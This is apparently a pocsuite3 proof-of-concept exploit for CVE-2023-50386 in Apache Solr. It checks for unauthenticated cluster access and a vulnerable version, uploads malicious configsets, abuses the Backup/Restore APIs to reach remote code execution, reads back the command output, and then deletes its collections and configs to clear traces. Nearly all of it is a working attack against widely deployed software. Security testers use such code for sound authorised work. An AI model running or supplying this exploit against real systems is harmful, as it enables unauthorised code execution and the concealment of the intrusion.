# -*- coding: utf-8 -*- # @Time : 2024/2/21 20:47 # @Author : vvmdx # @File : CVE-2023-50386.py # @Project : pocsuite3 """ POC 先判断是否需要登录,再判断版本,如果无需登录且版本在影响范围内的话,开始实施攻击,最后清理痕迹 """ import json import re from pocsuite3.api import VUL_TYPE, Output, POCBase, POC_CATEGORY, register_poc, requests class SolrPOC(POCBase): vulID = '' version = '1.0' author = ['vvmdx'] vulDate = '2024-02-09' createDate = '2024-02-21' updateDate = '2024-02-28' references = ['https://solr.apache.org/security.html#cve-2023-50386-apache-solr-backuprestore-apis-allow-for-deployment-of-executables-in-malicious-configsets'] name = 'Apache Solr Backup/Restore APIs 未授权访问导致远程代码执行(CVE-2023-50386)' appPowerLink = 'https://solr.apache.org/' appName = 'Apache Solr' appVersion = '6.0.0 through 8.11.2\n9.0.0 before 9.4.1' vulType = VUL_TYPE.CODE_EXECUTION desc = '''''' samples = [ ] category = POC_CATEGORY.EXPLOITS.WEBAPP pocDesc = ''' 验证模式下判断版本,攻击模式下代码执行 ''' def _verify(self): result = {} if self.url.endswith("/"): url = self.url[:-1] else: url = self.url header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36" } solr_url = url + "/solr/" resp_solr = requests.get(solr_url, headers=header, verify=False) zk_url = url + "/solr/admin/zookeeper" resp_zk = requests.get(zk_url, headers=header, verify=False) # 1. 是否未授权访问 # 2. 是否为集群启动 if resp_solr.status_code == 200 and resp_zk.status_code == 200: # 3. 提取版本号 pattern = re.compile(r'href="img/favicon.ico\?_=(\d+\.\d+\.\d+)"') match = pattern.search(resp_solr.text) if match is not None: version_str = match[1] # 4. 检查版本是否在漏洞影响范围内 if self.check_version(version_str, "6.0.0", "8.11.3") or self.check_version(version_str, "9.0.0", "9.4.1"): # 5. 是的话就在漏洞范围内 result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = solr_url return self.parse_output(result) def get_version_tuple(self, version_str): # 转为tuple方便直接比大小 return tuple(map(int, (version_str.split(".")))) # 检查版本是否在漏洞影响范围内 def check_version(self, version_str, low_str, up_str): version = self.get_version_tuple(version_str) low = self.get_version_tuple(low_str) up = self.get_version_tuple(up_str) return low <= version < up def _attack(self): result = {} if self.url.endswith("/"): url = self.url[:-1] else: url = self.url header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36" } url = url + "/solr/admin" # 1. 上传压缩包conf1和conf2 upload_url = url + "/configs?action=UPLOAD&name=conf1" if self.upload(upload_url, "conf1.zip"): # 上传成功 # 2. 创建collection create_url = url + "/collections?action=CREATE&name=collection1&numShards=1&replicationFactor=1&wt=json&collection.configName=conf1" if self.action(create_url): # 创建成功 # 3. 备份第一步 backup_url_1 = url + "/collections?action=BACKUP&collection=collection1&location=/var/solr/data/&name=collection2_shard1_replica_n1" if self.action(backup_url_1): # 备份成功 # 4. 备份第二步 backup_url_2 = url + "/collections?action=BACKUP&collection=collection1&location=/var/solr/data/collection2_shard1_replica_n1&name=lib" if self.action(backup_url_2): # 备份成功 # 5. 上传conf2 upload_url_2 = url + "/configs?action=UPLOAD&name=conf2" if self.upload(upload_url_2, "conf2.zip"): # 上传成功 # 6. 执行 exec_url = url + "/collections?action=CREATE&name=collection2&numShards=1&replicationFactor=1&wt=json&collection.configName=conf2" resp_exec = requests.get(exec_url, headers=header, verify=False) if resp_exec.status_code == 400: read_url = url + "/info/properties" resp_read = requests.get(read_url, headers=header, verify=False) if resp_read.status_code == 200 and "root:" in resp_read.text: # 执行成功 # 7. 读取回显 json_data = json.loads(resp_read.text) exec_res = json_data['system.properties']['java.library.path'] result['VerifyInfo'] = {} result['VerifyInfo']['result'] = exec_res # 清理痕迹 resp_del = requests.get(url + "/collections?action=DELETE&name=collection1", headers=header, verify=False) # 要先清理collection,config清理先后顺序无所谓 if resp_del.status_code == 200: requests.get(url + "/configs?action=DELETE&name=conf1", headers=header, verify=False) requests.get(url + "/configs?action=DELETE&name=conf2", headers=header, verify=False) return self.parse_output(result) def action(self, action_url): header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36" } resp = requests.get(action_url, headers=header, verify=False) json_data = json.loads(resp.text) if resp.status_code == 200 and json_data['responseHeader']['status'] == 0 and "success" in json_data: return True return False def upload(self, upload_url, file_name): header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36", "Content-Type": "application/octet-stream" } with open(file_name, "rb") as file: # 直接将zip的二进制数据作为post body传 resp = requests.post(upload_url, headers=header, data=file, verify=False) json_data = json.loads(resp.text) if resp.status_code == 200 and json_data['responseHeader']['status'] == 0: return True return False def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('Target is not vulnerable') return output register_poc(SolrPOC)